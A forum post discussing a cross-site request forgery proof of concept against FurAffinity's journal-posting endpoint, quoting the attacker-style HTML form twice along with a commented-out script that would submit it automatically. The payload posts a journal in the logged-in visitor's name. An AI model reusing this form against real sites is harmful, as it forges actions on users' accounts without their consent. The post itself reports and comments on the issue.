I highly doubt anyone was hacked. Some guy named Eevee just posted a page with a proof of concept that posts a journal to the logged on account if you click a button. I'm sure people copied the commands in the source. I missed all this, though. Was busy. I only saw the original:
<>form action="http://www.furaffinity.net/controls/journal/" method="POST">
<>input type="hidden" name="id" value="">
<>input type="hidden" name="do" value="update">
<>input type="hidden" name="subject" value="FA's journal-posting exploit is not fixed">
<>input type="hidden" name="message" value="You can see for yourself: ***** (You don't need this link here. It is freely available. - Neko);This has been a PSA by Eevee.">
<>p>Okay well people are linking this proof-of-concept around as a legit attack which is no bueno. <>button>This button<>/button> will post a journal on FA in your name.<>/p>
<>p>I warned FA about this problem in October. :(<>/p>
<>p>Don't listen to Carenath he is a sourpuss.<>/p>
<>p>—Eevee<>/p>
<>/form>
<>form action="http://www.furaffinity.net/controls/journal/" method="POST">
<>input type="hidden" name="id" value="">
<>input type="hidden" name="do" value="update">
<>input type="hidden" name="subject" value="FA's journal-posting exploit is not fixed">
<>input type="hidden" name="message" value="You can see for yourself: ***** (You don't need this link here. It is freely available. - Neko);This has been a PSA by Eevee.">
<>p>Okay well people are linking this proof-of-concept around as a legit attack which is no bueno. <>button>This button<>/button> will post a journal on FA in your name.<>/p>
<>p>I warned FA about this problem in October. :(<>/p>
<>p>Don't listen to Carenath he is a sourpuss.<>/p>
<>p>—Eevee<>/p>
<>/form>
<>!--
<>script type="text/javascript">
document.getElementsByTagName('form')[0].submit();
<>/script>
-->
Didn't click it, though. That would be silly. I can see what it does. Silly people with their silly buttons and form commands...